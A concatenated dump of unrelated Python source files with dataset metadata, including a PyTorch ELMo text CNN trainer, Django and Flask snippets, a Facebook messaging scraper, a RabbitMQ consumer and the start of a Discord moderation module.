classification model, based on the paper.\n \"\"\"\n\n def __init__(self, config):\n super(TextCNN, self).__init__()\n\n V = config.vocab_size\n E = config.embedding_dim\n Nf = config.num_filters\n Ks = config.kernel_sizes\n C = config.num_classes\n Dr = config.dropout_prob\n\n # elmo\n self.elmo = Elmo(options_file, weight_file, 2, dropout=0, requires_grad=False) # default is False\n\n # self.embedding = nn.Embedding(V, E) # embedding layer\n\n\n # three different convolutional layers\n self.convs = nn.ModuleList([nn.Conv1d(E, Nf, k) for k in Ks])\n self.dropout = nn.Dropout(Dr) # a dropout layer\n self.fc1 = nn.Linear(3 * Nf, C) # a dense layer for classification\n\n @staticmethod\n def conv_and_max_pool(x, conv):\n \"\"\"Convolution and global max pooling layer\"\"\"\n return F.relu(conv(x).permute(0, 2, 1).max(1)[0])\n\n def forward(self, inputs):\n\n #add elmo\n\n elmo_embedding = self.elmo(inputs)\n sents = elmo_embedding['elmo_representations'][-1]\n\n # print ('Shape for elmo...',sents.size()) # should be [50, 200, 64] , but now it is [50, 172, 64]\n\n # Conv1d takes in (batch, channels, seq_len), but raw embedded is (batch, seq_len, channels)\n embedded = sents.permute(0, 2, 1)\n\n x = [self.conv_and_max_pool(embedded, k) for k in self.convs] # convolution and global max pooling\n x = self.fc1(self.dropout(torch.cat(x, 1))) # concatenation and dropout\n\n return x\n\n\ndef get_time_dif(start_time):\n \"\"\"\n Return the time used since start_time.\n \"\"\"\n end_time = time.time()\n time_dif = end_time - start_time\n return timedelta(seconds=int(round(time_dif)))\n\n\ndef evaluate(data, model, loss):\n \"\"\"\n Evaluation, return accuracy and loss\n \"\"\"\n model.eval() # set mode to evaluation to disable dropout\n data_loader = DataLoader(data, batch_size=50)\n\n data_len = len(data)\n total_loss = 0.0\n y_true, y_pred = [], []\n\n for data, label in data_loader:\n data, label = Variable(data, volatile=True), Variable(label, volatile=True)\n if 
use_cuda:\n data, label = data.cuda(), label.cuda()\n\n output = model(data)\n losses = loss(output, label)\n\n total_loss += losses.data[0]\n pred = torch.max(output.data, dim=1)[1].cpu().numpy().tolist()\n y_pred.extend(pred)\n y_true.extend(label.data)\n\n acc = (np.array(y_true) == np.array(y_pred)).sum()\n return float(acc) / float(data_len), total_loss / data_len\n\n\ndef train(config):\n \"\"\"\n Train and evaluate the model with training and validation data.\n \"\"\"\n print('Loading data...')\n start_time = time.time()\n\n corpus = Corpus(config.file_path, config.test_path, config.abbre, config.seq_length, config.vocab_size)\n config.num_classes = corpus.num_classes\n print(corpus)\n config.vocab_size = len(corpus.words) #useless now\n\n\n\n config.model_file = config.model_file + '.pk'\n train_data = TensorDataset(torch.LongTensor(corpus.x_train_ids), torch.LongTensor(corpus.y_train))\n test_data = TensorDataset(torch.LongTensor(corpus.x_test_ids), torch.LongTensor(corpus.y_test))\n\n\n print('Configuring CNN model...')\n model = TextCNN(config)\n print(model)\n\n if use_cuda:\n model.cuda()\n\n # optimizer and loss function\n criterion = nn.CrossEntropyLoss(size_average=False)\n optimizer = optim.Adam(model.parameters(), lr=config.learning_rate)\n\n # set the mode to train\n print(\"Training and evaluating...\")\n\n best_acc = 0.0\n for epoch in range(config.num_epochs):\n # load the training data in batch\n model.train()\n train_loader = DataLoader(train_data, batch_size=config.batch_size)\n for x_batch, y_batch in train_loader:\n inputs, targets = Variable(x_batch), Variable(y_batch)\n print ('INPUT...',inputs.size())\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n optimizer.zero_grad()\n outputs = model(inputs) # forward computation\n loss = criterion(outputs, targets)\n\n # backward propagation and update parameters\n loss.backward()\n optimizer.step()\n\n # evaluate on both training and test dataset\n train_acc, train_loss = 
evaluate(train_data, model, criterion)\n test_acc, test_loss = evaluate(test_data, model, criterion)\n\n if test_acc > best_acc:\n # store the best result\n best_acc = test_acc\n improved_str = '*'\n torch.save(model.state_dict(), config.model_file)\n else:\n improved_str = ''\n\n time_dif = get_time_dif(start_time)\n msg = \"Epoch {0:3}, Train_loss: {1:>7.2}, Train_acc {2:>6.2%}, \" \\\n + \"Test_loss: {3:>6.2}, Test_acc {4:>6.2%}, Time: {5} {6}\"\n print(msg.format(epoch + 1, train_loss, train_acc, test_loss, test_acc, time_dif, improved_str))\n\n test_acc, test_f1 = test(model, test_data, config.model_file)\n\n\n return test_acc, test_f1\n\n\ndef test(model, test_data, model_file):\n \"\"\"\n Test the model on test dataset.\n \"\"\"\n print(\"Testing...\")\n start_time = time.time()\n test_loader = DataLoader(test_data, batch_size=50)\n\n # restore the best parameters\n model.load_state_dict(torch.load(model_file, map_location=lambda storage, loc: storage))\n\n y_true, y_pred = [], []\n for data, label in test_loader:\n data, label = Variable(data, volatile=True), Variable(label, volatile=True)\n if use_cuda:\n data, label = data.cuda(), label.cuda()\n\n output = model(data)\n pred = torch.max(output.data, dim=1)[1].cpu().numpy().tolist()\n y_pred.extend(pred)\n y_true.extend(label.data)\n\n test_acc = metrics.accuracy_score(y_true, y_pred)\n test_f1 = metrics.f1_score(y_true, y_pred, average='macro')\n # print(\"Test accuracy: {0:>7.2%}, F1-Score: {1:>7.2%}\".format(test_acc, test_f1))\n\n # print(\"Precision, Recall and F1-Score...\")\n # print(metrics.classification_report(y_true, y_pred, target_names=['POS', 'NEG']))\n\n # print('Confusion Matrix...')\n cm = metrics.confusion_matrix(y_true, y_pred)\n # print(cm)\n\n # print(\"Time usage:\", get_time_dif(start_time))\n\n return test_acc,test_f1\n\n\n# def predict(text):\n# # load config and vocabulary\n# config = TCNNConfig()\n# _, word_to_id = read_vocab(vocab_file)\n# labels = ['POS', 'NEG']\n#\n# # load 
model\n# model = TextCNN(config)\n# model.load_state_dict(torch.load(model_file, map_location=lambda storage, loc: storage))\n#\n# # process text\n# text = process_text(text, word_to_id, config.seq_length)\n# text = Variable(torch.LongTensor([text]), volatile=True)\n#\n# if use_cuda:\n# model.cuda()\n# text = text.cuda()\n#\n# # predict\n# model.eval() # very important\n# output = model(text)\n# pred = torch.max(output, dim=1)[1]\n#\n# return labels[pred.data[0]]\n\n\nif __name__ == '__main__':\n\n # iterate each small dataset\n # iterate each small dataset\n file_list = [f for f in os.listdir(train_path)]\n test_file_list = [f for f in os.listdir(test_path)]\n accuracy = []\n f1 = []\n for test_file in test_file_list:\n config = TCNNConfig()\n config.abbre = test_file.split('_')[0]\n print ('Now...',config.abbre)\n config.file_path = train_path + config.abbre + '.txt'\n config.test_path = test_path + test_file\n config.model_file = os.path.join(save_path, config.abbre)\n\n score, f1_score = train(config)\n\n accuracy.append(score)\n f1.append(f1_score)\n print(config.abbre, score, f1_score)\n\n print('Average acc %0.4f' % (sum(accuracy) / len(accuracy)))\n print('Average f1 %0.4f' % (sum(f1) / len(f1)))\n\n\n # file_list = [f for f in os.listdir(test_path)]\n # accuracy = []\n # f1 = []\n # for f in file_list:\n # config = TCNNConfig()\n # # update train and test path\n # config.file_path += f\n # config.test_path += f\n # config.model_file = os.path.join(save_path, f)\n #\n # score, f1_score = train(config)\n #\n # accuracy.append(score)\n # f1.append(f1_score)\n # print(f, score, f1_score)\n #\n # print('Average acc %0.4f' % (sum(accuracy) / len(accuracy)))\n # print('Average f1 %0.4f' % (sum(f1) / len(f1)))\n\n\n\n# macro\n# Average acc 0.9386\n# Average f1 0.7609\n# 0.9452 0.7562\n\n\n# micro\n# 0.9450 0.9450\n\n\n# with 5-fold\n# micro\n# Average acc 0.9358\n# Average f1 
0.9358\n\n\n'''\n\n\n'''","sub_path":"src/cnn_pytorch.py","file_name":"cnn_pytorch.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"255884065","text":"__author__ = 'Anna'\n\nfrom sqlalchemy import Column, ForeignKey, Integer\nfrom sqlalchemy.orm import relationship\nfrom Base import *\n\n\nclass SetPersonTypeApplicationType(Base):\n\n __tablename__ = 'set_person_type_application_type'\n\n application_type = Column(Integer, ForeignKey('cl_application_type.code'), primary_key=True)\n application_type_ref = relationship(\"ClApplicationType\")\n\n person_type = Column(Integer, ForeignKey('cl_person_type.code'), primary_key=True)\n person_type_ref = relationship(\"ClPersonType\")\n","sub_path":"model/SetPersonTypeApplicationType.py","file_name":"SetPersonTypeApplicationType.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"339487599","text":"#!/usr/bin/env python\n#coding:utf-8\n#{'teacher_name':'halen','sex':'female','age':'27','assets':15000,'course':[],'identity':'teacher'}\nfrom Course_system.lib import Open_file\nclass Teacher():\n def __init__(self,teacher_name,sex,age,assets):\n self.teacher_name=teacher_name\n self.sex=sex\n self.age=age\n self.assets=assets\n #self.course=[]\n\n def teach_fee(self):\n pass\n\n @staticmethod\n def create_change_teacher_info(choice_msg,data):\n flag=False\n while not flag:\n #传入的choice_msg为3时,为创建老师,判断原数据是否存在,不存在就创建并写入数据,存在就打印已经存在\n if choice_msg=='3':\n res_data = Open_file.Open_file_class(Open_file.teacher_info_file).read()\n if data['teacher_name'] in res_data:\n print('The curriculum already exists,if you do not continue, press the q key')\n break\n res_course = Teacher(data['teacher_name'], data['sex'],\n data['age'],data['assets'])\n print('create teacher information successfully!')\n\n #拼接成字典\n new_course_dict = 
{data['teacher_name']: data}\n file_name=Open_file.teacher_info_file\n f = Open_file.Open_file_class(file_name, model='wb')\n res_data.update(new_course_dict)\n\n # print(res_data.update(new_course_dict))\n f.write(res_data)\n # print(res_data)\n return res_course\n\n #当choice_msg为4的时候,就判断���据是否存在,如不存在就打印不存在,存在则update并写入\n elif choice_msg == '4':\n read_data = Open_file.Open_file_class(Open_file.teacher_info_file).read()\n if data['teacher_name'] in read_data:\n new_course = {data['teacher_name']: data}\n read_data.update(new_course)\n Res = Open_file.Open_file_class(Open_file.teacher_info_file, model='wb')\n Res.write(read_data)\n print('change teacher information successfully')\n return True\n else:\n print('teacher is not exists')\n break\n else:\n return False\n\n\n @staticmethod\n def choice_tercher_func():\n f=Open_file.Open_file_class(Open_file.teacher_info_file)\n userdata=f.read()\n for i in userdata:\n print(i)\n #print(userdata[i])\n\n\n\n\n\n\nif __name__ == '__main__':\n Teacher.choice_tercher_func()","sub_path":"autoclient/Course_system/src/Teacher_class.py","file_name":"Teacher_class.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"36843254","text":"from mss import mss\nimport cv2\nimport time\nimport sys\n\n# time.sleep(2)\n# with mss() as sct:\n# filename = sct.shot()\n\n# img = cv2.imread(filename)\n\ndef screenshot():\n print (False)\n with mss() as sct:\n filename = sct.shot()\n img = cv2.imread(filename)\n img = cv2.resize(img,(900,600))\n img = img[100:540, 250:860]\n # cv2.imshow(\"cropped\", img)\n # cv2.waitKey(0)\n cv2.imwrite(sys.argv[1],img)\n print (True)\n sys.stdout.flush()\n","sub_path":"src/takeScreenShot.py","file_name":"takeScreenShot.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"592515049","text":"from django.urls import 
path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.DetailView.as_view(), name='detail'),\n path('serwis/', views.SerwisIndexView.as_view(), name='serwis-index'),\n path('serwis/add/', views.SerwisCreate.as_view(), name='serwis-create'),\n path('serwis//del/', views.SerwisDelete.as_view(), name='serwis-delete'),\n path('serwis//update/', views.SerwisUpdate.as_view(), name='serwis-update'),\n path('sprzety/', views.SprzetIndexView.as_view(), name='sprzet-index'),\n path('sprzety//', views.SprzetDetailView.as_view(), name='sprzet-detail'),\n path('sprzety/add/', views.SprzetCreate.as_view(), name='sprzet-create'),\n path('sprzety//del/', views.SprzetDelete.as_view(), name='sprzet-delete'),\n path('sprzety//update/', views.SprzetUpdate.as_view(), name='sprzet-update'),\n]\n","sub_path":"sprzet/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29363769","text":"import pickle\nimport os\nimport requests as r\nfrom bs4 import BeautifulSoup as b\nfrom getpass import getpass, getuser\n\nFB_URL = \"https://mbasic.facebook.com\"\nFB_QUERY = FB_URL + \"/search/?query=\"\nFB_MSG = FB_URL + \"/messages/read/?fbid=\"\n\nCOOKIES = \"/home/\" + getuser() + \"/.mercurius_c\"\n\n\ndef need_connection(f):\n def dec(self, *args, **kwargs):\n if self.connected:\n return f(self, *args, **kwargs)\n else:\n \"[✖]Not connected.\"\n return dec\n\n\nclass Facebook:\n def __init__(self, cookies_enabled):\n self.connected = False\n self.cookies = None\n self.s = r.Session()\n self.cookies_enabled = True if int(cookies_enabled) else False\n if os.path.exists(COOKIES):\n if self.cookies_enabled:\n with open(COOKIES, 'rb') as c:\n self.cookies = pickle.load(c)\n get = self.s.get(FB_URL, cookies=self.cookies)\n self.check_connection(b(get.text, \"lxml\"))\n else:\n os.remove(COOKIES)\n else:\n self.email = 
input(\"[?]Email: \")\n self.password = getpass(\"[?]Password: \")\n self.connect()\n\n def check_connection(self, html):\n # 2 Steps auth\n if html.find('input', id=\"approvals_code\"):\n action = html.find('form').get('action')\n inputs = html.findAll('input')\n post_data = {}\n for tag in inputs:\n if tag[\"type\"] != \"text\":\n post_data[tag[\"name\"]] = tag[\"value\"]\n else:\n post_data[\"approvals_code\"] = getpass(\"[?]Code: \")\n post = self.s.post(FB_URL + action, data=post_data)\n self.check_connection(b(post.text, \"lxml\"))\n elif html.find('div', title=\"Remember Browser\"):\n action = html.find('form').get('action')\n inputs = html.findAll('input')\n post_data = {}\n for tag in inputs:\n if tag[\"type\"] in [\"hidden\", \"submit\"]:\n post_data[tag[\"name\"]] = tag[\"value\"]\n else:\n post_data[\"action_name_selected\"] = \"save_device\"\n post = self.s.post(FB_URL + action, data=post_data)\n self.check_connection(b(post.text, \"lxml\"))\n self.connected = True\n\n def connect(self):\n html = b(self.s.get(FB_URL).text, \"lxml\")\n post_data = {}\n action = html.find('form', id='login_form').get('action')\n inputs = html.findAll('input')\n for tag in inputs:\n if tag[\"type\"] == \"hidden\" and tag[\"name\"] != \"_fb_noscript\":\n post_data[tag[\"name\"]] = tag[\"value\"]\n elif tag[\"name\"] == \"login\":\n post_data[\"email\"] = self.email\n post_data[\"pass\"] = self.password\n post_data[\"login\"] = tag[\"value\"]\n post = self.s.post(action, data=post_data)\n self.check_connection(b(post.text, \"lxml\"))\n if self.connected:\n if self.cookies_enabled:\n self.cookies = self.s.cookies\n self.save_cookies()\n else:\n print(\"[✖]Log in failed. 
Wrong email/password ?\")\n\n @need_connection\n def save_cookies(self):\n with open(COOKIES, 'wb') as f:\n pickle.dump(self.cookies, f)\n\n @need_connection\n def get_user_id_fullname(self, name):\n rq = b(self.s.get(FB_QUERY + name, cookies=self.cookies).text, \"lxml\")\n ids = [self.get_id_from_msg_url(url[\"href\"]) for url in rq.findAll('a')\n if \"/messages/compose/?ids=\" in url[\"href\"]]\n # For the moment we suppose that the name provided for the query\n # is accurate enough so that the first result matches the right person\n if len(ids) == 0:\n return None, None\n return ids[0], rq.find(\"td\", {\"class\": \"bk\"}).find('a').text\n\n @need_connection\n def get_last_message_date(self, id):\n rq = b(self.s.get(FB_MSG + id, cookies=self.cookies).text, \"lxml\")\n return rq.findAll(\"abbr\")[-1].text\n\n def get_id_from_msg_url(self, url):\n return url.split(\"=\")[1].split(\"&\")[0]\n\n @need_connection\n def send_message(self, msg, id):\n html = b(self.s.get(FB_MSG + id, cookies=self.cookies).text, \"lxml\")\n post_data = {}\n form = html.find('form', id='composer_form')\n action = form.get('action')\n inputs = form.findAll('input')\n for tag in inputs:\n if tag[\"type\"] == \"hidden\" and tag.has_attr(\"value\"):\n post_data[tag[\"name\"]] = tag[\"value\"]\n post_data['body'] = msg\n post = self.s.post(FB_URL + action, data=post_data, cookies=self.cookies)\n","sub_path":"mercurius/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"152399318","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch.nn as nn\nimport torch\nimport logging\nimport numpy as np\nfrom contrib import adf\nfrom opts import parser\n\nFLAGS = parser.parse_args()\n\n\ndef keep_variance(x, min_variance):\n return x + min_variance\n\n\ndef finitialize_msra(modules, 
small=False):\n logging.info(\"Initializing MSRA\")\n for layer in modules:\n if isinstance(layer, adf.Conv2d) or isinstance(layer, adf.Linear): # convolution: bias=0, weight=msra\n nn.init.kaiming_normal_(layer.weight)\n if small:\n layer.weight.data.mul_(0.001)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\n\ndef finitialize_xavier(modules, small=False):\n logging.info(\"Initializing Xavier\")\n for layer in modules:\n if isinstance(layer, adf.Conv2d) or isinstance(layer, adf.Linear): # convolution: bias=0, weight=msra\n nn.init.xavier_normal_(layer.weight)\n if small:\n layer.weight.data.mul_(0.001)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\nclass Resnet8_MCDO_adf(nn.Module):\n\n def __init__(self, img_channels, output_dim, noise_variance=1e-3, min_variance=1e-3, initialize_msra=False):\n super(Resnet8_MCDO_adf, self).__init__()\n \n p = FLAGS.dropout\n self._keep_variance_fn = lambda x: keep_variance(x, min_variance=min_variance)\n self._noise_variance = noise_variance\n self.layer1 = adf.Sequential(\n adf.Conv2d(\n in_channels=img_channels, out_channels=32, kernel_size=5, padding=5//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.MaxPool2d(keep_variance_fn=self._keep_variance_fn))\n \n self.residual_block_1a = adf.Sequential(\n adf.BatchNorm2d(32),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=32, out_channels=32, kernel_size=3, padding=3//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.BatchNorm2d(32),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=32, out_channels=32, kernel_size=3, padding=3//2,\n bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.parallel_conv_1 = adf.Sequential(\n adf.Conv2d(\n in_channels=32, out_channels=32, kernel_size=1, padding=1//2,\n stride=2, bias=True, 
keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.residual_block_2a = adf.Sequential(\n adf.BatchNorm2d(32),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, padding=3//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.BatchNorm2d(64),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=64, out_channels=64, kernel_size=3, padding=3//2,\n bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.parallel_conv_2 = adf.Sequential(\n adf.Conv2d(\n in_channels=32, out_channels=64, kernel_size=1, padding=1//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.residual_block_3a = adf.Sequential(\n adf.BatchNorm2d(64),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=64, out_channels=128, kernel_size=3, padding=3//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.BatchNorm2d(128),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=128, out_channels=128, kernel_size=3, padding=3//2,\n bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.parallel_conv_3 = adf.Sequential(\n adf.Conv2d(\n in_channels=64, out_channels=128, kernel_size=1, padding=1//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.output_dim = output_dim\n\n self.last_block = adf.Sequential(\n adf.ReLU(),\n adf.Linear(6272,self.output_dim))\n \n # Initialize layers exactly as in Keras\n for layer in self.modules():\n if isinstance(layer, adf.Conv2d) or isinstance(layer, adf.Linear): # convolution: bias=0, weight=msra\n nn.init.xavier_uniform_(layer.weight, 
gain=nn.init.calculate_gain('relu'))\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, adf.BatchNorm2d): \n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)\n \n\n \n def forward(self, x):\n \n inputs_mean = x\n inputs_variance = torch.zeros_like(inputs_mean) + self._noise_variance\n x = inputs_mean, inputs_variance\n x1 = self.layer1(*x)\n # First residual block\n x2 = self.residual_block_1a(*x1)\n x1 = self.parallel_conv_1(*x1)\n x3_mean = x1[0].add(x2[0])\n x3_var = x1[1].add(x2[1])\n x3 = x3_mean, x3_var\n # Second residual block\n x4 = self.residual_block_2a(*x3)\n x3 = self.parallel_conv_2(*x3)\n x5_mean = x3[0].add(x4[0])\n x5_var = x3[1].add(x4[1])\n x5 = x5_mean, x5_var\n # Third residual block\n x6 = self.residual_block_3a(*x5)\n x5 = self.parallel_conv_3(*x5)\n x7_mean = x5[0].add(x6[0])\n x7_var = x5[1].add(x6[1])\n x7 = x7_mean, x7_var\n \n out_mean = x7[0].view(x7[0].size(0), -1) # Flatten\n out_var = x7[1].view(x7[1].size(0), -1)\n out = out_mean, out_var\n out = self.last_block(*out)\n \n return out\n\n","sub_path":"src/model_zoo/resnet8_MCDO_adf.py","file_name":"resnet8_MCDO_adf.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653183295","text":"\"\"\"\nLists all .raw_hdf5 files in a RawVideos folder and tries to find the matching MaskedVideos. 
\nOnly works on Phenix videos.\n\"\"\"\n\nimport sys\nimport pandas as pd\nfrom pathlib import Path\n\ndef best_guess_for_masked_video(rawvideo_fname):\n expected_maskedvideo_fname = str(rawvideo_fname.with_suffix('.hdf5'))\n expected_maskedvideo_fname = Path(expected_maskedvideo_fname.replace('RawVideos','MaskedVideos'))\n return expected_maskedvideo_fname\n\n\ndef find_mismatched_Phenix_videos(rawvideos_dir):\n \"\"\"Tries to find masked videos by applying the same name transformation that Tierpsy does:\n RawVideos -> MaskedVideos, .raw_hdf5 -> .hdf5\n Only works on Phenix videos taken using the Gecko plugin\"\"\"\n\n # initialise mismatched list\n mismatched_rawvideos = []\n # initialise status variable\n any_rawvideos = False\n \n # list all raw videos, if none, abort\n rawvideos_list = list(rawvideos_dir.rglob('*.raw_hdf5'))\n if len(rawvideos_list) == 0:\n return any_rawvideos, mismatched_rawvideos\n else:\n any_rawvideos = True\n # for each of the raw videos:\n for rawvideo_fname in rawvideos_list:\n # get the best guess for the masked video\n expected_maskedvideo_fname = best_guess_for_masked_video(rawvideo_fname)\n # print(expected_maskedvideo_fname)\n # if it does not exist\n if not expected_maskedvideo_fname.exists():\n # append to mismatched list\n mismatched_rawvideos.append(rawvideo_fname.relative_to(rawvideos_dir))\n return mismatched_rawvideos\n \n\nif __name__=='__main__':\n \n # call function\n rawvideos_dir = Path(sys.argv[1])\n any_rawvideos, mismatched_rawvideos = find_mismatched_Phenix_videos(rawvideos_dir)\n if not any_rawvideos:\n print('No Raw videos')\n else:\n # now print results\n if len(mismatched_rawvideos) > 0:\n print('Raw videos missing a masked video')\n print('In {}'.format(rawvideos_dir))\n for fname in mismatched_rawvideos:\n print(fname)\n else:\n print('No mismatch in 
{}'.format(rawvideos_dir))","sub_path":"mytierpsytools/check_files_analysed.py","file_name":"check_files_analysed.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"251688506","text":"import sqlite3\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\n\n \n\nitems = []\n\n\nclass ItemList(Resource):\n def get(self):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n queryGetItems = \"SELECT * FROM items\"\n row = cursor.execute(queryGetItems)\n row = cursor.fetchall()\n \n connection.commit()\n connection.close()\n print(row)\n items = []\n if(row):\n for item in row:\n items.append({'name': item[0], 'price': item[1]})\n return items\n else:\n return {\"message\": \"Items nor found\"}\n\n # return {'items': items}, 200\n","sub_path":"code/itemlist.py","file_name":"itemlist.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108780559","text":"'''\n magic-cards consumer\n\n A RabbitMQ consumer that saves data to JSON.\n'''\nimport json\nimport logging\nimport os\nfrom threading import Lock\n\nfrom connection import pika_conn\nfrom dao import get_cards, read_file, write_file\nfrom settings import ALL, MQ_HOST, MQ_MOVE_QUEUE\n\ncache = {}\nlock = Lock()\n\ndebug = os.getenv('DEBUG', False)\nlogger = logging.getLogger('consumer')\nlogging.basicConfig(level=logging.DEBUG if debug else logging.WARN)\n\n\ndef on_message(ch, method, properties, body):\n '''\n Parse messages received by RabbitMQ\n '''\n logger.debug('Message received')\n try:\n message = body.decode('utf-8')\n if message == ALL:\n global cache\n cache = {card['GathererId']: card for card in get_cards()}\n else:\n data = json.loads(message)\n for card in data:\n cache[card['GathererId']] = card\n except Exception as e:\n logger.exception(e)\n else:\n with 
lock:\n write_file(cache)\n logger.warn('Text file updated')\n\n\ndef start():\n '''\n Setup RabbitMQ queue binding\n '''\n logger.info('Starting consumer')\n\n try:\n global cache\n cache = read_file()\n except (FileNotFoundError, json.decoder.JSONDecodeError):\n pass\n\n with pika_conn(MQ_HOST, MQ_MOVE_QUEUE) as channel:\n channel.basic_consume(\n on_message,\n queue=MQ_MOVE_QUEUE,\n no_ack=True)\n\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"src/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"36465545","text":"from ensemble_compilation.graph_representation import SchemaGraph, Table\n\n\ndef gen_cover_schema(csv_path=\"./ssb-benchmark/cover.csv\"):\n\n schema = SchemaGraph()\n schema.add_table(Table('cover',\n attributes=['c0','c1','c2','c3','c4','c5','c6','c7','c8','c9'],\n irrelevant_attributes=None,\n no_compression=['c0','c1','c2','c3','c4','c5','c6','c7','c8','c9'],\n csv_file_location=csv_path,\n table_size=581012, primary_key=['c0'],\n ))\n\n return schema\n","sub_path":"schemas/cover/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334155412","text":"\"\"\"blog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom qblog.views import index, category_archive, about, page, archvie_list\n#import django_markdown.urls\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', index, name = 'home'),\n url(r'^markdown/', include('django_markdown.urls')),\n\n url(r'^category/(?P\\w+)/$', category_archive, name = 'article_category'),\n url(r'^page/(?P\\d+)/$', page, name = 'article_page'),\n url(r'^archive/$', archvie_list, name = 'archvie_list'),\n\n url(r'about/', about, name = 'about_me'),\n\n]\n","sub_path":"blog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"595494029","text":"from __future__ import annotations\n\nfrom src.single_guild_bot import SingleGuildBot as Bot\n\nfrom abc import ABC, abstractmethod\nfrom enum import Enum, unique\nfrom dataclasses import dataclass, field\n\nimport datetime\nimport random\nfrom typing import Tuple, List\n\nimport discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nfrom config import Roles\n\nDEFAULT_PUNISHMENT_UNIT = \"minutes\"\nDEFAULT_PUNISHMENT_AMOUNT = 5\n\nUNITS = [\"minute\", \"minutes\", \"min\", \"hour\", \"hours\", \"day\", \"days\"]\nGENERIC_REASONS = [\n \"inappropriate behavior\",\n \"breaking the community guidelines\",\n \"breaking rules\",\n]\n\n\n@unique\nclass PunishmentID(Enum):\n WARN = \"WARN\"\n MUTE = \"MUTE\"\n KICK = \"KICK\"\n BAN = \"BAN\"\n PERMABAN = \"PERMABAN\"\n\n @classmethod\n async def convert(cls, _: commands.Context, punishment_type: str):\n return PunishmentID[punishment_type.upper()]\n\n @staticmethod\n def timed_punishments() -> List[PunishmentID]:\n return [PunishmentID.MUTE, PunishmentID.BAN]\n\n\ndef get_random_reason() -> str:\n return random.choice(GENERIC_REASONS)\n\n\ndef 
